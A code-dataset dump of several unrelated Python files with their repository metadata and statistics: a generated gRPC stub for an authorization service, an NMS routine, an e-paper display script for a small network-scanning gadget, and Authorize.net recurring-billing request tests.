| 0.647059
| 0.134328
| 0.268657
| 0.477612
| 0.701493
| 0.701493
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 151
| 2
| 79
| 75.5
| 0.937063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d49e0811544e183cb84fdaf2c9685b4f60b2acad
| 6,392
|
py
|
Python
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 13
|
2021-02-17T02:05:51.000Z
|
2022-02-10T01:52:32.000Z
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 6
|
2021-07-17T15:49:10.000Z
|
2022-03-04T13:01:11.000Z
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 6
|
2021-03-15T04:35:03.000Z
|
2022-03-04T11:12:10.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from authzed.api.v0 import namespace_service_pb2 as authzed_dot_api_dot_v0_dot_namespace__service__pb2
class NamespaceServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ReadConfig = channel.unary_unary(
'/authzed.api.v0.NamespaceService/ReadConfig',
request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.SerializeToString,
response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.FromString,
)
self.WriteConfig = channel.unary_unary(
'/authzed.api.v0.NamespaceService/WriteConfig',
request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.SerializeToString,
response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.FromString,
)
self.DeleteConfigs = channel.unary_unary(
'/authzed.api.v0.NamespaceService/DeleteConfigs',
request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.SerializeToString,
response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.FromString,
)
class NamespaceServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def ReadConfig(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def WriteConfig(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteConfigs(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_NamespaceServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ReadConfig': grpc.unary_unary_rpc_method_handler(
servicer.ReadConfig,
request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.FromString,
response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.SerializeToString,
),
'WriteConfig': grpc.unary_unary_rpc_method_handler(
servicer.WriteConfig,
request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.FromString,
response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.SerializeToString,
),
'DeleteConfigs': grpc.unary_unary_rpc_method_handler(
servicer.DeleteConfigs,
request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.FromString,
response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'authzed.api.v0.NamespaceService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class NamespaceService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ReadConfig(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/ReadConfig',
authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.SerializeToString,
authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def WriteConfig(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/WriteConfig',
authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.SerializeToString,
authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteConfigs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/DeleteConfigs',
authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.SerializeToString,
authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 48.06015
| 131
| 0.704787
| 629
| 6,392
| 6.73132
| 0.162162
| 0.075579
| 0.08975
| 0.0718
| 0.817667
| 0.801606
| 0.801606
| 0.742796
| 0.730043
| 0.69367
| 0
| 0.00951
| 0.226846
| 6,392
| 132
| 132
| 48.424242
| 0.847228
| 0.089487
| 0
| 0.470588
| 1
| 0
| 0.081523
| 0.051625
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.019608
| 0.029412
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4d099ff0ddee6afddfee249418175ab58e8825b
| 3,331
|
py
|
Python
|
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | 2
|
2018-05-01T13:56:00.000Z
|
2020-01-12T17:59:51.000Z
|
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | null | null | null |
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import numpy as np
# cimport numpy as np
def max(a, b):
return a if a >= b else b
def min(a, b):
return a if a <= b else b
def nms(dets, thresh):
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
ndets = dets.shape[0]
suppressed = np.zeros((ndets), dtype=np.int)
# # nominal indices
# cdef int _i, _j
# # sorted indices
# cdef int i, j
# # temp variables for box i's (the box currently under consideration)
# cdef np.float32_t ix1, iy1, ix2, iy2, iarea
# # variables for computing overlap with box j (lower scoring box)
# cdef np.float32_t xx1, yy1, xx2, yy2
# cdef np.float32_t w, h
# cdef np.float32_t inter, ovr
keep = []
for _i in range(ndets):
i = order[_i]
if suppressed[i] == 1:
continue
keep.append(i)
ix1 = x1[i]
iy1 = y1[i]
ix2 = x2[i]
iy2 = y2[i]
iarea = areas[i]
for _j in range(_i + 1, ndets):
j = order[_j]
if suppressed[j] == 1:
continue
xx1 = max(ix1, x1[j])
yy1 = max(iy1, y1[j])
xx2 = min(ix2, x2[j])
yy2 = min(iy2, y2[j])
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (iarea + areas[j] - inter)
if ovr >= thresh:
suppressed[j] = 1
return keep
def nms_new(dets, thresh):
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
ndets = dets.shape[0]
suppressed = np.zeros((ndets), dtype=np.int)
# # nominal indices
# cdef int _i, _j
# # sorted indices
# cdef int i, j
# # temp variables for box i's (the box currently under consideration)
# cdef np.float32_t ix1, iy1, ix2, iy2, iarea
# # variables for computing overlap with box j (lower scoring box)
# cdef np.float32_t xx1, yy1, xx2, yy2
# cdef np.float32_t w, h
# cdef np.float32_t inter, ovr
keep = []
for _i in range(ndets):
i = order[_i]
if suppressed[i] == 1:
continue
keep.append(i)
ix1 = x1[i]
iy1 = y1[i]
ix2 = x2[i]
iy2 = y2[i]
iarea = areas[i]
for _j in range(_i + 1, ndets):
j = order[_j]
if suppressed[j] == 1:
continue
xx1 = max(ix1, x1[j])
yy1 = max(iy1, y1[j])
xx2 = min(ix2, x2[j])
yy2 = min(iy2, y2[j])
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (iarea + areas[j] - inter)
ovr1 = inter / iarea
ovr2 = inter / areas[j]
if ovr >= thresh or ovr1 > 0.95 or ovr2 > 0.95:
suppressed[j] = 1
return keep
| 27.081301
| 74
| 0.47193
| 468
| 3,331
| 3.309829
| 0.205128
| 0.030988
| 0.06714
| 0.072305
| 0.858618
| 0.830213
| 0.830213
| 0.830213
| 0.830213
| 0.830213
| 0
| 0.070275
| 0.367757
| 3,331
| 122
| 75
| 27.303279
| 0.665242
| 0.273491
| 0
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050633
| false
| 0
| 0.012658
| 0.025316
| 0.113924
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be01625a0fd176e87ce4290fb61ca46431e1bc1e
| 6,726
|
py
|
Python
|
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import os
import miezifaces as faces
resdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'res')
libdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'lib')
if os.path.exists(libdir):
sys.path.append(libdir)
import logging
from waveshare_epd import epd2in7
import time
from PIL import Image, ImageDraw, ImageFont
import traceback
logging.basicConfig(level=logging.DEBUG)
def draw_startup(gateway_ip):
try:
epd = epd2in7.EPD()
# Init
logging.info('init and Clear')
epd.init()
epd.Clear(0xFF)
# Declaring Fonts
font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
font35 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 35)
# Drawing
logging.info('Drawing...')
himage = Image.new('1', (epd.height, epd.width), 255)
draw = ImageDraw.Draw(himage)
# Title
draw.text((10, 0), 'miezikatz', font=font24, fill=0)
# Face
draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
# Explanation
draw.text((10, 150), 'Ready for meowing! Press Button...', font=font12, fill=0)
# Gateway IP
draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
draw.text((130, 40), gateway_ip, font=font12, fill=0)
draw.rectangle((125, 25, 250, 55), outline = 0)
epd.display(epd.getbuffer(himage))
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info('ctrl + c:')
epd2in7.epdconfig.module_exit()
exit()
def draw_scanning(gateway_ip):
if gateway_ip == '':
return
try:
epd = epd2in7.EPD()
# Init
logging.info('init and Clear')
epd.init()
epd.Clear(0xFF)
# Declaring Fonts
font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
font35 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 35)
# Drawing
logging.info('Drawing...')
himage = Image.new('1', (epd.height, epd.width), 255)
draw = ImageDraw.Draw(himage)
# Title
draw.text((10, 0), 'miezikatz', font=font24, fill=0)
# Face
draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
# Explanation
draw.text((10, 150), 'Meowing at ' + gateway_ip + '/24', font=font12, fill=0)
# Gateway IP
draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
draw.text((130, 40), gateway_ip, font=font12, fill=0)
draw.rectangle((125, 25, 250, 55), outline = 0)
epd.display(epd.getbuffer(himage))
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info('ctrl + c:')
epd2in7.epdconfig.module_exit()
exit()
def draw_scanned(gateway_ip, linecount):
if gateway_ip == '':
return
try:
epd = epd2in7.EPD()
# Init
logging.info('init and Clear')
epd.init()
epd.Clear(0xFF)
# Declaring Fonts
font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
font35 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 35)
# Drawing
logging.info('Drawing...')
himage = Image.new('1', (epd.height, epd.width), 255)
draw = ImageDraw.Draw(himage)
# Title
draw.text((10, 0), 'miezikatz', font=font24, fill=0)
# Face
draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
# Explanation
draw.text((10, 150), 'Finished! Maybe collected sth :3 ', font=font12, fill=0)
# Gateway IP
draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
draw.text((130, 40), gateway_ip, font=font12, fill=0)
draw.rectangle((125, 25, 250, 55), outline = 0)
# Linecount
draw.text((130, 65), 'Wrote', font=font12, fill=0)
draw.text((130, 75), str(linecount), font=font12, fill=0)
draw.text((130, 85), 'lines to file', font=font12, fill=0)
draw.rectangle((125, 60, 250, 100), outline = 0)
epd.display(epd.getbuffer(himage))
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info('ctrl + c:')
epd2in7.epdconfig.module_exit()
exit()
def draw_shutdown():
try:
epd = epd2in7.EPD()
# Init
logging.info('init and Clear')
epd.init()
epd.Clear(0xFF)
# Declaring Fonts
font18 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 18)
font10 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 10)
'''
Himage2 = Image.new('1', (epd.height, epd.width), 255) # 255: clear the frame
bmp = Image.open(os.path.join(picdir, '100x100.bmp'))
Himage2.paste(bmp, (50,10))
epd.display(epd.getbuffer(Himage2))
'''
# Drawing
logging.info('Drawing...')
himage = Image.new('1', (epd.height, epd.width), 255)
bmp = Image.open(os.path.join(resdir, 'sleeping_miezi.bmp'))
draw = ImageDraw.Draw(himage)
# Title
draw.text((2, 2), 'Miezi tired. Zzzzz...', font=font18, fill=0)
# Explanation
draw.text((2, 18), '[ Don\'t wake her up :( ]', font=font10, fill=0)
# Bitmap
himage.paste(bmp, (25, 40))
epd.display(epd.getbuffer(himage))
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info('ctrl + c:')
epd2in7.epdconfig.module_exit()
exit()
| 32.492754
| 90
| 0.559917
| 818
| 6,726
| 4.559902
| 0.184597
| 0.055764
| 0.040214
| 0.051475
| 0.819303
| 0.812869
| 0.801072
| 0.769169
| 0.738338
| 0.738338
| 0
| 0.074277
| 0.295421
| 6,726
| 206
| 91
| 32.650485
| 0.712809
| 0.043711
| 0
| 0.758065
| 0
| 0
| 0.07781
| 0
| 0
| 0
| 0.002599
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.064516
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be20c7c2ab2269d88a1f9a7e088409fd6a482b0a
| 11,207
|
py
|
Python
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 30
|
2015-03-13T01:31:52.000Z
|
2021-06-11T08:49:43.000Z
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 41
|
2015-01-30T20:01:05.000Z
|
2022-03-31T23:11:56.000Z
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 34
|
2015-01-11T20:22:03.000Z
|
2022-03-28T20:34:22.000Z
|
from authorize import Configuration
from authorize.xml_data import prettify
from datetime import date
from unittest import TestCase
CREATE_RECURRING = {
'name': 'Ultimate Robot Supreme Plan',
'amount': 40.00,
'total_occurrences': 30,
'start_date': date.today().isoformat(),
'interval_length': 2,
'interval_unit': 'months',
'trial_amount': 30.00,
'trial_occurrences': 2,
'credit_card': {
'card_number': '4111111111111111',
'expiration_month': '04',
'expiration_year': '2014',
'card_code': '456',
},
'billing': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
'order': {
'invoice_number': 'INV0001',
'description': 'Just another invoice...',
},
'customer': {
'merchant_id': '1234567890',
'email': 'rob@robotronstudios.com',
},
'shipping': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
}
UPDATE_RECURRING = {
'name': 'Ultimate Robot Supreme Plan',
'amount': 40.00,
'total_occurrences': 30,
'start_date': date.today().isoformat(),
'trial_amount': 30.00,
'trial_occurrences': 2,
'credit_card': {
'card_number': '4111111111111111',
'expiration_month': '04',
'expiration_year': '2014',
'card_code': '456',
},
'billing': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
'order': {
'invoice_number': 'INV0001',
'description': 'Just another invoice...',
},
'customer': {
'merchant_id': '1234567890',
'email': 'rob@robotronstudios.com',
},
'shipping': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
}
UPDATE_RECURRING_NO_PAYMENT = UPDATE_RECURRING.copy()
del UPDATE_RECURRING_NO_PAYMENT['credit_card']
UPDATE_RECURRING_PAYMENT_ONLY = {
'credit_card': {
'card_number': '4111111111111111',
'expiration_month': '04',
'expiration_year': '2014',
'card_code': '456',
},
}
CREATE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBCreateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<interval>
<length>2</length>
<unit>months</unit>
</interval>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBCreateSubscriptionRequest>
'''.format(date.today().isoformat())
DETAILS_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBGetSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBGetSubscriptionRequest>
'''
STATUS_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBGetSubscriptionStatusRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBGetSubscriptionStatusRequest>
'''
UPDATE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBUpdateSubscriptionRequest>
'''.format(date.today().isoformat())
UPDATE_RECURRING_NO_PAYMENT_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBUpdateSubscriptionRequest>
'''.format(date.today().isoformat())
UPDATE_RECURRING_PAYMENT_ONLY_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<paymentSchedule/>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
</subscription>
</ARBUpdateSubscriptionRequest>
'''
DELETE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBCancelSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBCancelSubscriptionRequest>
'''
class RecurringAPITests(TestCase):
maxDiff = None
def test_create_recurring_request(self):
request_xml = Configuration.api.recurring._create_request(CREATE_RECURRING)
request_string = prettify(request_xml)
self.assertEqual(request_string, CREATE_RECURRING_REQUEST.strip())
def test_details_recurring_request(self):
request_xml = Configuration.api.recurring._details_request('0932576929034')
request_string = prettify(request_xml)
self.assertEqual(request_string, DETAILS_RECURRING_REQUEST.strip())
def test_status_recurring_request(self):
request_xml = Configuration.api.recurring._status_request('0932576929034')
request_string = prettify(request_xml)
self.assertEqual(request_string, STATUS_RECURRING_REQUEST.strip())
def test_update_recurring_request(self):
request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING)
request_string = prettify(request_xml)
self.assertEqual(request_string, UPDATE_RECURRING_REQUEST.strip())
request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING_PAYMENT_ONLY)
request_string = prettify(request_xml)
self.assertEqual(request_string, UPDATE_RECURRING_PAYMENT_ONLY_REQUEST.strip())
request_xml = Configuration.api.recurring._update_request('0932576929034', UPDATE_RECURRING_NO_PAYMENT)
request_string = prettify(request_xml)
self.assertEqual(request_string, UPDATE_RECURRING_NO_PAYMENT_REQUEST.strip())
def test_delete_recurring_request(self):
request_xml = Configuration.api.recurring._delete_request('0932576929034')
request_string = prettify(request_xml)
self.assertEqual(request_string, DELETE_RECURRING_REQUEST.strip())
| 30.788462
| 113
| 0.661729
| 1,021
| 11,207
| 7.114594
| 0.132223
| 0.02891
| 0.030286
| 0.03304
| 0.890419
| 0.869631
| 0.852974
| 0.852974
| 0.811812
| 0.811812
| 0
| 0.067355
| 0.19586
| 11,207
| 363
| 114
| 30.873278
| 0.738682
| 0
| 0
| 0.80531
| 0
| 0
| 0.672348
| 0.307665
| 0
| 0
| 0
| 0
| 0.020649
| 1
| 0.014749
| false
| 0
| 0.011799
| 0
| 0.032448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
07873eb573537bca2047393ff87735b4b7388285
| 9,568
|
py
|
Python
|
premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 839
|
2020-07-20T13:29:34.000Z
|
2022-03-31T21:09:16.000Z
|
